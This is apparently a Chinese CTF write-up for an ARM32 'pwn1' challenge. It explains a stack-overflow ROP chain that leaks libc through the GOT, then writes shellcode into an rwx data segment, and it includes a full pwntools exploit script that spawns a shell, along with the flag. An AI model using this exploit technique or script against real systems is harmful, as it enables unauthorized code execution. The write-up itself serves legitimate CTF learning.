[Pwn] pwn1 - cpt.shao

xp0int Posted on Apr 29 2021

arm32简单栈溢出，就是找gadget花了点时间。搜索不到可以设置r0的gadget。
观察到`0x104d8`是程序已有的printf逻辑
```
.text:000104D0                 LDR             R3, =(aInput - 0x104DC) ; "input: "
.text:000104D4                 ADD             R3, PC, R3 ; "input: "
.text:000104D8                 MOV             R0, R3  ; format
.text:000104DC                 BL              printf
.text:000104E0                 SUB             R3, R11, #-buf
.text:000104E4                 MOV             R2, #0x300 ; nbytes
.text:000104E8                 MOV             R1, R3  ; buf
.text:000104EC                 MOV             R0, #0  ; fd
.text:000104F0                 BL              read
.text:000104F4                 MOV             R3, #0
.text:000104F8                 MOV             R0, R3
.text:000104FC                 SUB             SP, R11, #4
.text:00010500                 POP             {R11,PC}
```
这里printf是从r3获取参数的，然后我们可以搜到一条设置r3的gadget，0x10348：pop {r3, pc}。
将r3设置为got地址，然后跳到上面`104d8`的地方就可以泄露libc，同时进行下一次read。注意执行过后还可以把sp迁移到其他位置。观察vmmap发现程序data段竟然是rwx的。所以做法就是设置好read的地址，指向data段0x21000的地方，发送shellcode，然后read结束之后再直接跳data段就可以执行shellcode了。
```python
# flag{AoCiUtzYFsh4KhLXdiTATxEvKx}
from pwn import *
import re

context.terminal = ['tmux', 'splitw', '-h']
context.endian = "little"
context.arch = 'arm'
env = {'LD_PRELOAD': ''}
context.log_level = "debug"

if len(sys.argv) == 1:
    p = process('')
elif len(sys.argv) == 3:
    p = remote(sys.argv[1], sys.argv[2])

gdbcmd = "set $BSS=0x606020\n" # set addr variable here to easily access in gdb

# 0x555555554000

se      = lambda data               :p.send(data)
sa      = lambda delim,data         :p.sendafter(delim, data)
sl      = lambda data               :p.sendline(data)
sla     = lambda delim,data         :p.sendlineafter(delim, data)
sea     = lambda delim,data         :p.sendafter(delim, data)
rc      = lambda numb=4096          :p.recv(numb)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr        :p.info(tag + ': {:#x}'.format(addr))

# gdb.attach(p, gdbcmd)
rop = ""
rop += p32(0x10348) # pop r3, pc
rop += p32(0x2100c) # got
rop += p32(0x104d8)

sla("input: ", cyclic(256) + p32(0x21000+260) + rop)
leak = uu32(rc(4))
info_addr("leak", leak)
libc = leak - 0x3d39c
info_addr("libc", libc)

rop = ""
rop += p32(0x21000)
sc = asm("mov r0, r0;\n"*0x10 + shellcraft.linux.sh())
print(hexdump(sc))
sl(sc.ljust(0x100) + p32(0) + p32(0x21000))
p.interactive()
```

打赏还是打残，这是个问题